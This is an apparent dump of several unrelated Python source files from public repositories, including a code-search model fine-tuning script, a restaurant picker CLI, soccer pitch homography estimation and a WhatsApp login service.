T5Config, T5ForConditionalGeneration, T5Tokenizer,\n PLBartConfig, PLBartForConditionalGeneration, PLBartTokenizer)\nimport multiprocessing\nimport time\nfrom accelerate import Accelerator\nfrom sklearn.metrics import recall_score, precision_score, f1_score, accuracy_score\n\nfrom models import CosQAModel\nfrom configs import add_args, set_seed, set_dist\nfrom utils import get_filenames, get_elapse_time, acc_and_f1\nfrom models import get_model_size\n\nMODEL_CLASSES = {'roberta': (RobertaConfig, RobertaModel, RobertaTokenizer),\n 'vanilla': (RobertaConfig, RobertaModel, RobertaTokenizer),\n 'gpt2': (GPT2Config, GPT2Model, GPT2Tokenizer),\n 't5': (T5Config, T5ForConditionalGeneration, T5Tokenizer),\n 'codet5': (T5Config, T5ForConditionalGeneration, RobertaTokenizer),\n 'bart': (BartConfig, BartForConditionalGeneration, BartTokenizer),\n 'plbart': (PLBartConfig, PLBartForConditionalGeneration, PLBartTokenizer)}\n\ncpu_cont = multiprocessing.cpu_count()\n\nlogging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',\n datefmt='%m/%d/%Y %H:%M:%S',\n level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\nclass InputFeatures(object):\n \"\"\"A single training/test features for a example.\"\"\"\n\n def __init__(self, code_tokens, code_ids, nl_tokens, nl_ids, label, idx):\n self.code_tokens = code_tokens\n self.code_ids = code_ids # code tokenized idxs\n self.nl_tokens = nl_tokens\n self.nl_ids = nl_ids # nl tokenized idxs\n self.label = label\n self.idx = idx\n\n\nclass InputFeaturesTrip(InputFeatures):\n \"\"\"A single training/test features for a example. Add docstring seperately. \"\"\"\n\n def __init__(self, code_tokens, code_ids, nl_tokens, nl_ids, ds_tokens, ds_ids, label, idx):\n super(InputFeaturesTrip, self).__init__(code_tokens, code_ids, nl_tokens, nl_ids, label, idx)\n self.ds_tokens = ds_tokens\n self.ds_ids = ds_ids\n\n\ndef convert_examples_to_features(js, tokenizer, args):\n label = js['label'] if js.get('label', None) else 0\n\n code = js['code']\n if args.code_type == 'code_tokens':\n code = js['code_tokens']\n # if args.model_type != \"gpt2\":\n # code_tokens = tokenizer.tokenize(code)[:args.max_seq_length - 2]\n # code_tokens = [tokenizer.cls_token] + code_tokens + [tokenizer.sep_token]\n # code_ids = tokenizer.convert_tokens_to_ids(code_tokens)\n # padding_length = args.max_seq_length - len(code_ids)\n # code_ids += [tokenizer.pad_token_id] * padding_length\n # else:\n code_tokens = code.split()\n code_ids = tokenizer.encode(\" \".join(code_tokens), padding='max_length', max_length=args.max_seq_length, truncation=True)\n\n nl = js['doc']\n # if args.model_type != \"gpt2\":\n # nl_tokens = tokenizer.tokenize(nl)[:args.max_seq_length - 2]\n # nl_tokens = [tokenizer.cls_token] + nl_tokens + [tokenizer.sep_token]\n # nl_ids = tokenizer.convert_tokens_to_ids(nl_tokens)\n # padding_length = args.max_seq_length - len(nl_ids)\n # nl_ids += [tokenizer.pad_token_id] * padding_length\n # else:\n nl_tokens = nl.split()\n nl_ids = tokenizer.encode(\" \".join(nl_tokens), padding='max_length', max_length=args.max_seq_length, truncation=True)\n\n return InputFeatures(code_tokens, code_ids, nl_tokens, nl_ids, label, js['idx'])\n\n\nclass TextDataset(Dataset):\n def __init__(self, tokenizer, args, file_path=None):\n # file: json fiel, each dict contains keys: idx, query, doc, code (or 'function_tokens' in a list of string), docstring_tokens (list of strings)\n self.examples = []\n data = []\n with open(file_path, 'r') as f:\n data = json.load(f)\n for js in data:\n self.examples.append(convert_examples_to_features(js, tokenizer, args))\n # if training set, print first three exampls\n if 'train' in file_path:\n for idx, example in enumerate(self.examples[:3]):\n logger.info(\"*** Example ***\")\n logger.info(\"idx: {}\".format(idx))\n logger.info(\"code_tokens: {}\".format([x.replace('\\u0120', '_') for x in example.code_tokens]))\n logger.info(\"code_ids: {}\".format(' '.join(map(str, example.code_ids))))\n logger.info(\"nl_tokens: {}\".format([x.replace('\\u0120', '_') for x in example.nl_tokens]))\n logger.info(\"nl_ids: {}\".format(' '.join(map(str, example.nl_ids))))\n\n def __len__(self):\n return len(self.examples)\n\n def __getitem__(self, i):\n \"\"\" return both tokenized code ids and nl ids and label\"\"\"\n return torch.tensor(self.examples[i].code_ids), \\\n torch.tensor(self.examples[i].nl_ids), \\\n torch.tensor(self.examples[i].label)\n\n\neval_dataset = None\n\n\ndef evaluate(args, model, tokenizer, accelerator=None):\n eval_output_dir = args.output_dir\n global eval_dataset\n if eval_dataset is None:\n eval_dataset = TextDataset(tokenizer, args, args.dev_filename)\n\n if not os.path.exists(eval_output_dir) and args.local_rank in [-1, 0]:\n os.makedirs(eval_output_dir)\n\n # Note that DistributedSampler samples randomly\n eval_sampler = SequentialSampler(eval_dataset) if args.local_rank == -1 else DistributedSampler(eval_dataset)\n eval_dataloader = DataLoader(eval_dataset, sampler=eval_sampler, batch_size=args.eval_batch_size, num_workers=0,\n pin_memory=True)\n\n if accelerator is not None:\n model, eval_dataloader = accelerator.prepare(model, eval_dataloader)\n\n # Eval!\n logger.info(\"***** Running evaluation *****\")\n logger.info(\" Num examples = %d\", len(eval_dataset))\n logger.info(\" Batch size = %d\", args.eval_batch_size)\n eval_loss = 0.0\n nb_eval_steps = 0\n model.eval()\n all_predictions = []\n all_labels = []\n for batch in eval_dataloader:\n code_inputs = batch[0].to(args.device)\n nl_inputs = batch[1].to(args.device)\n labels = batch[2].to(args.device)\n with torch.no_grad():\n lm_loss, predictions = model(code_inputs, nl_inputs, labels)\n # lm_loss,code_vec,nl_vec = model(code_inputs,nl_inputs)\n eval_loss += lm_loss.mean().item()\n all_predictions.append(predictions.cpu())\n all_labels.append(labels.cpu())\n nb_eval_steps += 1\n all_predictions = torch.cat(all_predictions, 0).squeeze().numpy()\n all_labels = torch.cat(all_labels, 0).squeeze().numpy()\n eval_loss = torch.tensor(eval_loss / nb_eval_steps)\n\n results = acc_and_f1(all_predictions, all_labels)\n results.update({\"eval_loss\": float(eval_loss)})\n return results\n\n\ndef test(args, model, tokenizer, accelerator=None):\n test_dataset = TextDataset(tokenizer, args, args.test_filename)\n eval_sampler = SequentialSampler(test_dataset) if args.local_rank == -1 else DistributedSampler(test_dataset)\n eval_dataloader = DataLoader(test_dataset, sampler=eval_sampler, batch_size=args.eval_batch_size)\n\n answers = {}\n with open(args.answer_filename, 'r', encoding='utf-8') as f:\n for line in f.readlines():\n line = line.strip()\n answers[line.split('\\t')[0]] = int(line.split('\\t')[1])\n\n if accelerator is not None:\n model, eval_dataloader = accelerator.prepare(model, eval_dataloader)\n\n logger.info(\"***** Running Test *****\")\n logger.info(\" Num examples = %d\", len(test_dataset))\n logger.info(\" Batch size = %d\", args.eval_batch_size)\n\n eval_loss = 0.0\n nb_eval_steps = 0\n all_predictions = []\n all_labels = []\n for batch in eval_dataloader:\n code_inputs = batch[0].to(args.device)\n nl_inputs = batch[1].to(args.device)\n labels = batch[2].to(args.device)\n with torch.no_grad():\n lm_loss, predictions = model(code_inputs, nl_inputs, labels)\n eval_loss += lm_loss.mean().item()\n all_predictions.append(predictions.cpu())\n all_labels.append(labels.cpu())\n\n nb_eval_steps += 1\n all_predictions = torch.cat(all_predictions, 0).squeeze().numpy()\n # all_labels = torch.cat(all_labels, 0).squeeze().numpy()\n # eval_loss = torch.tensor(eval_loss / nb_eval_steps)\n # results = acc_and_f1(all_predictions, all_labels)\n # results.update({\"eval_loss\": float(eval_loss)})\n\n # for key in results.keys():\n # logger.info(\" Final test %s = %s\", key, str(results[key]))\n logger.info(\" \" + \"*\" * 20)\n predictions = {}\n with open(os.path.join(args.output_dir, \"predictions.txt\"), 'w') as f:\n for example, pred in zip(test_dataset.examples, all_predictions.tolist()):\n f.write(example.idx + '\\t' + str(int(pred)) + '\\n')\n predictions[example.idx] = int(pred)\n\n scores = calculate_scores(answers, predictions)\n for key, value in scores.items():\n logger.info(\" Final test %s = %s\", key, str(value))\n\n return scores\n\n\ndef calculate_scores(answers, predictions):\n y_trues, y_preds = [], []\n for key in answers:\n if key not in predictions:\n logging.error(\"Missing prediction for index {}.\".format(key))\n y_trues.append(answers[key])\n y_preds.append(predictions[key])\n scores = {}\n scores['precision'] = precision_score(y_trues, y_preds)\n scores['recall'] = recall_score(y_trues, y_preds)\n scores['f1'] = f1_score(y_trues, y_preds)\n scores['acc'] = accuracy_score(y_trues, y_preds)\n return scores\n\n\ndef main():\n parser = argparse.ArgumentParser()\n t0 = time.time()\n args = add_args(parser)\n logger.info(args)\n\n # Initialize the accelerator. We will let the accelerator handle device placement for us in this example.\n accelerator = Accelerator(mixed_precision=\"fp16\")\n logger.info(accelerator.state)\n\n set_dist(args, accelerator=accelerator)\n set_seed(args)\n\n args.num_train_epochs = 3\n args.learning_rate = 5e-6\n args.warmup_steps = 500\n args.max_seq_length = 200\n args.code_type = \"code\"\n\n # Build model\n config_class, model_class, tokenizer_class = MODEL_CLASSES[args.model_type]\n if args.model_name_or_path == 'none':\n config = config_class.from_pretrained('roberta-base')\n config.num_labels = 2\n model = model_class(config)\n else:\n config = config_class.from_pretrained(args.config_name if args.config_name else args.model_name_or_path)\n config.num_labels = 2\n model = model_class.from_pretrained(args.model_name_or_path)\n tokenizer = tokenizer_class.from_pretrained(args.tokenizer_name)\n if args.model_type == 'gpt2':\n tokenizer.pad_token = tokenizer.eos_token\n\n model = CosQAModel(model, config, tokenizer, args)\n logger.info(\"Finish loading model [%s] from %s\", get_model_size(model), args.model_name_or_path)\n\n if args.load_model_path is not None:\n logger.info(\"Reload model from {}\".format(args.load_model_path))\n model.load_state_dict(torch.load(args.load_model_path))\n\n model.to(args.device)\n\n args.train_filename, args.dev_filename, args.test_filename = get_filenames(args.data_dir, args.task, args.sub_task)\n args.answer_filename = f\"{args.data_dir}/{args.task}/answers.txt\"\n\n pool = multiprocessing.Pool(cpu_cont)\n\n fa = open(os.path.join(args.output_dir, 'summary.log'), 'a+')\n loss_file = open(os.path.join(args.output_dir, 'loss.txt'), 'a+')\n time_file = open(os.path.join(args.output_dir, 'time_per_100_steps.txt'), 'a+')\n\n if args.do_train:\n if args.n_gpu > 1:\n # multi-gpu training\n model = torch.nn.DataParallel(model)\n if args.local_rank in [-1, 0] and args.data_num == -1:\n summary_fn = '{}/{}'.format(args.summary_dir, '/'.join(args.output_dir.split('/')[1:]))\n tb_writer = SummaryWriter(summary_fn)\n\n train_data = TextDataset(tokenizer, args, args.train_filename)\n\n if args.local_rank == -1:\n train_sampler = RandomSampler(train_data)\n else:\n train_sampler = DistributedSampler(train_data)\n train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size)\n\n num_train_optimization_steps = args.num_train_epochs * len(train_dataloader)\n save_steps = max(len(train_dataloader), 1)\n\n # Prepare optimizer and schedule (linear warmup and decay)\n no_decay = ['bias', 'LayerNorm.weight']\n optimizer_grouped_parameters = [\n {'params': [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],\n 'weight_decay': args.weight_decay},\n {'params': [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}\n ]\n optimizer = torch.optim.AdamW(optimizer_grouped_parameters, lr=args.learning_rate, eps=args.adam_epsilon)\n\n if args.warmup_steps < 1:\n warmup_steps = num_train_optimization_steps * args.warmup_steps\n else:\n warmup_steps = int(args.warmup_steps)\n scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps,\n num_training_steps=num_train_optimization_steps)\n\n # Start training\n train_example_num = len(train_data)\n logger.info(\"***** Running training *****\")\n logger.info(\" Num examples = %d\", train_example_num)\n logger.info(\" Batch size = %d\", args.train_batch_size)\n logger.info(\" Batch num = %d\", math.ceil(train_example_num / args.train_batch_size))\n logger.info(\" Num epoch = %d\", args.num_train_epochs)\n\n model, optimizer, train_dataloader = accelerator.prepare(\n model, optimizer, train_dataloader\n )\n model.zero_grad()\n\n best_results = {\"acc\": 0.0, \"precision\": 0.0, \"recall\": 0.0, \"f1\": 0.0, \"acc_and_f1\": 0.0}\n global_step, best_acc = 0, 0\n not_acc_inc_cnt = 0\n is_early_stop = False\n for cur_epoch in range(args.start_epoch, int(args.num_train_epochs)):\n # for cur_epoch in range(3):\n bar = tqdm(train_dataloader, total=len(train_dataloader), desc=\"Training\")\n nb_tr_examples, nb_tr_steps, tr_loss = 0, 0, 0\n last_time = time.time()\n model.train()\n for step, batch in enumerate(bar):\n code_inputs = batch[0].to(args.device)\n nl_inputs = batch[1].to(args.device)\n labels = batch[2].to(args.device)\n\n loss, predictions = model(code_inputs, nl_inputs, labels)\n\n if args.n_gpu > 1:\n loss = loss.mean() # mean() to average on multi-gpu.\n if args.gradient_accumulation_steps > 1:\n loss = loss / args.gradient_accumulation_steps\n tr_loss += loss.item()\n\n loss_file.write(f'epoch: {cur_epoch}, step {step}, global step: {global_step}, loss: {loss}\\n')\n\n nb_tr_examples += code_inputs.size(0)\n nb_tr_steps += 1\n # loss.backward()\n accelerator.backward(loss)\n torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)\n\n if nb_tr_steps % args.gradient_accumulation_steps == 0:\n # Update parameters\n optimizer.step()\n optimizer.zero_grad()\n scheduler.step()\n global_step += 1\n train_loss = round(tr_loss * args.gradient_accumulation_steps / nb_tr_steps, 4)\n bar.set_description(\"[{}] Train loss {}\".format(cur_epoch, round(train_loss, 3)))\n\n if nb_tr_steps % 100 == 0:\n time_spend = time.time() - last_time\n time_file.write(f'{time_spend}\\n')\n last_time = time.time()\n\n if args.do_eval:\n logger.info(\"***** CUDA.empty_cache() *****\")\n torch.cuda.empty_cache()\n\n results = evaluate(args, model, tokenizer, accelerator=accelerator)\n for key, value in results.items():\n logger.info(\" %s = %s\", key, round(value, 4))\n tb_writer.add_scalar(f\"eval_{key}\", value, cur_epoch)\n\n eval_acc = results[\"acc\"]\n if eval_acc >= best_results['acc']:\n not_acc_inc_cnt = 0\n logger.info(\" Best acc: %s\", round(eval_acc, 4))\n logger.info(\" \" + \"*\" * 20)\n fa.write(\"[%d] Best acc changed into %.4f\\n\" % (cur_epoch, round(eval_acc, 4)))\n best_acc = eval_acc\n # Save best checkpoint for best ppl\n output_dir = os.path.join(args.output_dir, 'checkpoint-best-acc')\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n if args.data_num == -1 or True:\n model_to_save = model.module if hasattr(model, 'module') else model\n output_model_file = os.path.join(output_dir, \"pytorch_model.bin\")\n torch.save(model_to_save.state_dict(), output_model_file)\n logger.info(\"Save the best acc model into %s\", output_model_file)\n else:\n not_acc_inc_cnt += 1\n logger.info(\"acc does not increase for %d epochs\", not_acc_inc_cnt)\n if not_acc_inc_cnt > args.patience:\n logger.info(\"Early stop as acc do not increase for %d times\", not_acc_inc_cnt)\n fa.write(\"[%d] Early stop as not_acc_inc_cnt=%d\\n\" % (cur_epoch, not_acc_inc_cnt))\n is_early_stop = True\n break\n\n model.train()\n\n if is_early_stop:\n break\n\n logger.info(\"***** CUDA.empty_cache() *****\")\n torch.cuda.empty_cache()\n\n if args.local_rank in [-1, 0] and args.data_num == -1:\n tb_writer.close()\n\n logger.info(\"Finish training and take %s\", get_elapse_time(t0))\n\n loss_file.close()\n time_file.close()\n\n if args.do_test:\n logger.info(\" \" + \"***** Testing *****\")\n logger.info(\" Batch size = %d\", args.eval_batch_size)\n\n for criteria in ['best-acc']:\n file = os.path.join(args.output_dir, 'checkpoint-{}/pytorch_model.bin'.format(criteria))\n logger.info(\"Reload model from {}\".format(file))\n model.load_state_dict(torch.load(file))\n\n results = test(args, model, tokenizer, accelerator)\n\n for key, value in results.items():\n fa.write(f\" Final test {key} = {str(value)}\\n\")\n\n if args.res_fn:\n with open(args.res_fn, 'a+') as f:\n f.write('[Time: {}] {}\\n'.format(get_elapse_time(t0), file))\n f.write(\"[%s] acc: %.4f\\n\\n\" % (\n criteria, results['acc']))\n logger.info(\"Finish and take {}\".format(get_elapse_time(t0)))\n fa.write(\"Finish and take {}\".format(get_elapse_time(t0)))\n fa.close()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"NougatCA/CodePTM_re_train","sub_path":"Fine-tune/run_cosqa.py","file_name":"run_cosqa.py","file_ext":"py","file_size_in_byte":20035,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"4"} +{"seq_id":"5238450362","text":"\"\"\"This Cli prompts the user a set of parameters to be provided and then picks a random restaurant matching the set of parameters.\"\"\"\nimport click\n\nfrom restaurant import *\n\n\n@click.command()\n@click.option('--price', type=click.Choice([\"cheap\", \"moderate\", \"expensive\", \"any\"]), prompt='price type of restaurant [\"cheap\", \"moderate\", \"expensive]')\n@click.option('--speed', type=click.Choice([\"slow\", \"moderate\", \"fast\", \"any\"]), prompt='speed of service and experience')\n@click.option('--ambiance', type=click.Choice([\"simple\", \"moderate\", \"fancy\", \"any\"]), prompt='the ambiance of the restaurent IE: laid back, bougie')\n@click.option('--nutrition', type=click.Choice([\"healthy\", \"moderate\", \"unhealthy\", \"any\"]), prompt='is it healthy for you?')\n@click.option('--ethnicity', type=click.Choice([\"filipino\", \"mexican\", \"italian\", \"american\", \"thai\", \"korean\", \"japanese\", \"chinese\", \"vietnamese\", \"mediterranean\", \"any\"]), prompt='the ethnic origin of the cuisine')\n@click.option('--result-type', type=click.Choice(['List', 'Random']), prompt='do you want a random selection or display list of restaurants')\ndef pick_restaurant_prompted(price: Price, speed: Speed, ambiance: Ambiance, nutrition: Nutrition, ethnicity: Ethnicity, result_type: str):\n \"\"\"Prints a random restaurant that satisfies the cli parameters.\n\n Args:\n price: Price range\n speed: Speed of service and experience\n ambiance: Indoor setting of the place\n nutrition: nutritional rating of a meal here on average\n ethnicity: Ethnic origin of the cuisine\n result_type: print list of restaurants or select one randomly\n\n Returns: None\n\n \"\"\"\n restaurants = []\n\n #for each restaurant check if restaurant doesn't meet specified criteria skip and dont add to list\n for i in get_restaurants():\n if price != None and i.price.name != price and price != \"any\":\n continue\n if speed != None and i.speed.name != speed and speed != \"any\":\n continue\n if ambiance != None and i.ambiance.name != ambiance and ambiance != \"any\":\n continue\n if nutrition != None and i.nutrition.name != nutrition and nutrition != \"any\":\n continue\n if ethnicity != None and i.ethnicity.name != ethnicity and ethnicity != \"any\":\n continue\n else:\n restaurants.append(i)\n\n #if no restaurants meet the criteria print message end return\n if len(restaurants) < 1:\n click.echo(\"No restaurant found matching criteria!\")\n return\n\n #print restaurants list\n if result_type == \"List\":\n for x in restaurants:\n click.echo(x.get_details())\n return\n\n #return random restaurant that meets criteria\n result = restaurants[randint(0, len(restaurants)-1)]\n click.echo(result.get_details())\n \nif __name__ == '__main__':\n pick_restaurant_prompted()\n","repo_name":"lbragadev/Restaurant-Picker","sub_path":"pick_restaurant_prompted.py","file_name":"pick_restaurant_prompted.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"74709675638","text":"import argparse\nimport json\nimport os\nimport cv2 as cv\nimport numpy as np\nfrom tqdm import tqdm\nfrom .camera import unproject_image_point\nfrom .soccerpitch import SoccerPitch\nimport time\n\ndef draw_detected_pitch_lines(canvas, lines, line_names, field):\n height, width, _ = canvas.shape\n for i in range(len(lines)):\n x1, y1, _ = lines[i][0]\n x2, y2, _ = lines[i][1]\n x1p = field.x_to_image(width,x1)\n x2p = field.x_to_image(width,x2)\n y1p = field.y_to_image(height,y1)\n y2p = field.y_to_image(height,y2)\n cv.line(canvas, (x1p, y1p), (x2p, y2p), (255, 0, 0), 4)\n cv.putText(canvas, line_names[i], (x1p, y1p), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255), 1, cv.LINE_AA)\n\n return canvas\n\n\ndef normalization_transform(points):\n \"\"\"\n Computes the similarity transform such that the list of points is centered around (0,0) and that its distance to the\n center is sqrt(2).\n :param points: point cloud that we wish to normalize\n :return: the affine transformation matrix\n \"\"\"\n center = np.mean(points, axis=0)\n\n d = 0.\n nelems = 0\n for p in points:\n nelems += 1\n x = p[0] - center[0]\n y = p[1] - center[1]\n di = np.sqrt(x ** 2 + y ** 2)\n d += (di - d) / nelems\n\n if d <= 0.:\n s = 1.\n else:\n s = np.sqrt(2) / d\n T = np.zeros((3, 3))\n T[0, 0] = s\n T[0, 2] = -s * center[0]\n T[1, 1] = s\n T[1, 2] = -s * center[1]\n T[2, 2] = 1\n return T\n\n\ndef estimate_homography_from_line_correspondences(lines, T1=np.eye(3), T2=np.eye(3)):\n \"\"\"\n Given lines correspondences, computes the homography that maps best the two set of lines.\n :param lines: list of pair of 2D lines matches.\n :param T1: Similarity transform to normalize the elements of the source reference system\n :param T2: Similarity transform to normalize the elements of the target reference system\n :return: boolean to indicate success or failure of the estimation, homography\n \"\"\"\n homography = np.eye(3)\n A = np.zeros((len(lines) * 2, 9))\n\n for i, line_pair in enumerate(lines):\n src_line = np.transpose(np.linalg.inv(T1)) @ line_pair[0]\n target_line = np.transpose(np.linalg.inv(T2)) @ line_pair[1]\n u = src_line[0]\n v = src_line[1]\n w = src_line[2]\n\n x = target_line[0]\n y = target_line[1]\n z = target_line[2]\n\n A[2 * i, 0] = 0\n A[2 * i, 1] = x * w\n A[2 * i, 2] = -x * v\n A[2 * i, 3] = 0\n A[2 * i, 4] = y * w\n A[2 * i, 5] = -v * y\n A[2 * i, 6] = 0\n A[2 * i, 7] = z * w\n A[2 * i, 8] = -v * z\n\n A[2 * i + 1, 0] = x * w\n A[2 * i + 1, 1] = 0\n A[2 * i + 1, 2] = -x * u\n A[2 * i + 1, 3] = y * w\n A[2 * i + 1, 4] = 0\n A[2 * i + 1, 5] = -u * y\n A[2 * i + 1, 6] = z * w\n A[2 * i + 1, 7] = 0\n A[2 * i + 1, 8] = -u * z\n\n try:\n u, s, vh = np.linalg.svd(A)\n except np.linalg.LinAlgError:\n return False, homography\n v = np.eye(3)\n has_positive_singular_value = False\n for i in range(s.shape[0] - 1, -2, -1):\n v = np.reshape(vh[i], (3, 3))\n\n if s[i] > 0:\n has_positive_singular_value = True\n break\n\n if not has_positive_singular_value:\n return False, homography\n\n homography = np.reshape(v, (3, 3))\n homography = np.linalg.inv(T2) @ homography @ T1\n homography /= homography[2, 2]\n\n return True, homography\n\n\ndef draw_pitch_homography(image, homography):\n \"\"\"\n Draws points along the soccer pitch markings elements in the image based on the homography projection.\n /!\\ This function assumes that the resolution of the image is 540p.\n :param image\n :param homography: homography that captures the relation between the world pitch plane and the image\n :return: modified image\n \"\"\"\n height, width, _ = image.shape\n field = SoccerPitch()\n polylines = field.sample_field_points()\n for line in polylines.values():\n for point in line:\n if point[2] == 0.:\n hp = np.array((point[0], point[1], 1.))\n projected = homography @ hp\n if projected[2] == 0.:\n continue\n projected /= projected[2]\n if 0 < projected[0] < height and 0 < projected[1] < width:\n cv.circle(image, (int(projected[0]), int(projected[1])), 1, (255, 0, 0), 1)\n\n return image\n\n\ndef homography_from_extremities(predictions, width, height):\n field = SoccerPitch()\n\n line_matches = []\n potential_3d_2d_matches = {}\n line_points = []\n line_names = []\n\n src_pts = []\n success = False\n for k, v in predictions.items():\n if k == 'Circle central' or \"unknown\" in k:\n continue\n # line_extremities_keys maps each detected line to two points\n P3D1 = field.line_extremities_keys[k][0]\n P3D2 = field.line_extremities_keys[k][1]\n # finds the pixel coordinates of the vertices of the line\n p1 = np.array([v[0]['x'] * width, v[0]['y'] * height, 1.])\n p2 = np.array([v[1]['x'] * width, v[1]['y'] * height, 1.])\n\n src_pts.extend([p1, p2])\n\n if P3D1 in potential_3d_2d_matches.keys():\n potential_3d_2d_matches[P3D1].extend([p1, p2])\n else:\n potential_3d_2d_matches[P3D1] = [p1, p2]\n if P3D2 in potential_3d_2d_matches.keys():\n potential_3d_2d_matches[P3D2].extend([p1, p2])\n else:\n potential_3d_2d_matches[P3D2] = [p1, p2]\n\n line = np.cross(p1, p2)\n if np.isnan(np.sum(line)) or np.isinf(np.sum(line)):\n continue\n line_pitch = field.get_2d_homogeneous_line(k)\n if line_pitch is not None:\n line_matches.append((line_pitch, line))\n line_points.append(field.get_line_vertices(k))\n line_names.append(k)\n if len(line_matches) >= 4:\n target_pts = [field.point_dict[k][:2] for k in potential_3d_2d_matches.keys()]\n T1 = normalization_transform(target_pts)\n T2 = normalization_transform(src_pts)\n success, homography = estimate_homography_from_line_correspondences(line_matches, T1, T2)\n if success:\n return True, homography, line_names, line_points\n return False, homography, line_names, line_points\n return False, np.array([]), [], []\n","repo_name":"GabrielDiazIV/pytch","sub_path":"tracker/track/localization/baseline_cameras.py","file_name":"baseline_cameras.py","file_ext":"py","file_size_in_byte":6420,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"4"} +{"seq_id":"31628703490","text":"# -*- coding:utf-8 -*-\n\nimport os\nBaseDir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nParams = {\n \"server\": \"192.168.2.1\",\n \"prot\": 9000,\n \"request_timeout\": 30,\n 'url':{\n \"asset_report_with_no_id\":\"/asset/repost/asset_with_no_asset_id\",\n \"asset_report\": \"/asset/report/\",\n },\n \"asset_id\": \"%s/var/.asset_id\" %BaseDir,\n \"log_file\": '%s/logs/run_log' %BaseDir,\n\n \"auth\":{\n 'user':\"lijie3721@126.com\",\n 'token':'bac',\n },\n}","repo_name":"zhongyuqing910/scripts","sub_path":"makingClient/conf/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"73681099637","text":"def buscar_letra_frase(frase, letra):\n for i, caracter in enumerate(frase):\n if caracter == letra:\n return i + 1\n return -1 \n\nif __name__ == \"__main__\":\n frase = input(\"Ingresa una frase \")\n letra = input(\"Ingresa una letra a buscar \")\n\n posicion = buscar_letra_frase(frase, letra)\n\n if posicion > 0:\n print(f\"La letra '{letra}' se encontro en la posicion {posicion} de la frase\")\n else:\n print(f\"No se encontro la letra '{letra}' en la frase\")\n","repo_name":"IES-Rafael-Alberti/2324-u2-sentencias-repetitivas-rekznoz","sub_path":"src/main20.py","file_name":"main20.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"43333869900","text":"from python_framework import Service, ServiceMethod\n\nfrom domain import LoginConstants\nfrom enumeration.AuthenticationStatus import AuthenticationStatus\nfrom dto import QRCodeDto\n\n@Service()\nclass LoginService:\n\n @ServiceMethod()\n def isAuthenticated(self) :\n authenticationResponse = self.client.whatsAppWeb.getAuthenticationStatus()\n return AuthenticationStatus.map(authenticationResponse.get('status')) in [\n AuthenticationStatus.AUTHENTICATED,\n AuthenticationStatus.ALREADY_AUTHENTICATED\n ]\n\n @ServiceMethod()\n def initiateAuthenticationByQRCode(self) :\n self.service.qRCode.openIfNedded()\n self.service.qRCode.foceRefresh()\n\n @ServiceMethod(requestClass=[QRCodeDto.QRCodeRequestDto])\n def createOrUpdateQRCode(self, dto) :\n self.service.qRCode.save(dto)\n self.service.qRCode.show()\n\n @ServiceMethod()\n def resumeAuthenticationByQRCode(self) :\n self.service.qRCode.closeQRCode()\n","repo_name":"SamuelJansen/idealizar-whats-app-manager-api","sub_path":"api/src/service/login/LoginService.py","file_name":"LoginService.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"30111048529","text":"#!/usr/bin/python\n\"\"\"Athena agent for CS4500.\n\n\nROFL:ROFL:LOL:ROFL:ROFL\n |\n L /---------\n LOL=== []\\\n L \\ \\\n \\_________\\\n | |\n -------------/\n\nCore gameplay logic\n\"\"\"\n\nimport gflags\nimport logging\nimport random\nimport time\n\nimport offer\nimport playercontext\nimport problem\nimport relation\n\ngflags.DEFINE_integer('offercount', 2,\n 'New offers to generate each round')\nFLAGS = gflags.FLAGS\n\nclass Game(object):\n \"\"\"Contain core gameplay logic in this class.\"\"\"\n\n REPLYTYPES = ['offer', 'reoffer', 'accept', 'provide', 'solve']\n\n def __init__(self, initialdata):\n # Get the game context\n self.context = playercontext.PlayerContext.FromString(initialdata)\n self.context.their_offered.sort()\n self.context.their_offered.reverse()\n # Store our player id locally\n self.id = int(self.context.playerid)\n # We make this a list of tuples, ('type', 'reply') \n self.replies = []\n\n def CountReplyType(self, typelist):\n \"\"\"Count the number of replies of a given type or types.\n\n Args:\n typelist: list of strings: List of REPLYTYPES\n\n Returns:\n integer\n \"\"\"\n count = 0\n for x in self.replies:\n if x[0] in typelist:\n count += 1\n return count\n\n def NumProposals(self):\n \"\"\"Number of proposals currently on the table.\"\"\"\n return self.CountReplyType(['offer', 'reoffer'])\n\n def NumPropositions(self):\n \"\"\"Number of propositions currently on the table.\"\"\"\n return self.CountReplyType(['accept', 'reoffer'])\n\n def ReachedMaxProposals(self):\n \"\"\"Have we offered enough proposals?\"\"\"\n if self.NumProposals() >= self.context.config.maxproposals:\n logging.info('Quitting offering because we reached maxProposals')\n return True\n else:\n return False\n\n def AddReply(self, replytype, reply):\n \"\"\"Add a reply to the stack.\n\n Args:\n replytype: (string) type of reply to add\n reply: (string) the reply itself\n \"\"\"\n if replytype in self.REPLYTYPES:\n logging.debug('Adding reply type \"%s\": \"%s\"' % (replytype, reply))\n self.replies.append((replytype, reply))\n else:\n logging.error('Invalid reply type \"%s\": \"%s\"' % (replytype, reply))\n\n def LogGameState(self):\n \"\"\"Do some game state logging.\"\"\"\n logging.info('Round %d Starting Balance: $%0.4f'\n % (self.context.currentround, self.context.balance))\n logging.debug('Their Offered: %s' % str(self.context.their_offered))\n logging.debug('Our Offered: %s' % str(self.context.our_offered))\n logging.debug('Accepted: %s' % 